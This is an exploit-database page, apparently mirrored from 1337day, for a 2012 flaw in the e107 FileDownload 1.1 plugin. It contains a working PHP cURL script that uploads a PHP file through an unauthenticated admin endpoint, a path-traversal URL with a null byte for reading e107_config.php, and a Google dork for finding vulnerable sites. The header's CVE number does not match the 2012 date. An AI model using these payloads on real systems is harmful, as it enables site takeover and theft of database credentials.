e107 FileDownload 1.1 Shell Upload / File Disclosure
CVE
Category
Price
Severity
CVE-2018-8036
CWE-20
$500
Critical
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2012-06-20
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012060241 Below is a copy:1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : e107 Plugins - FilleDownload Plugin Multiple Vulnerability
# Version : 1.1
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=20&id=14
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.14
# Date : 18-06-2012
# Google Dork : inurl:/e107_plugins/filedownload
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
1) Upload Shell
PostShell.php
<?php
$ch = curl_init("http://www.exemple.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('filename'=>'lo.php',
'accesses'=>'<?php phpinfo(); ?>'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/e107/e107_plugins/filedownload/filedownload/file_info/descriptions/lo.php.0
lo.php.0
<?php
phpinfo();
?>
2) Remote File Disclosure
http://www.exemple.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00
[CTRL-u] for results
# Site : 1337day.com Inj3ct0r Exploit Database
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum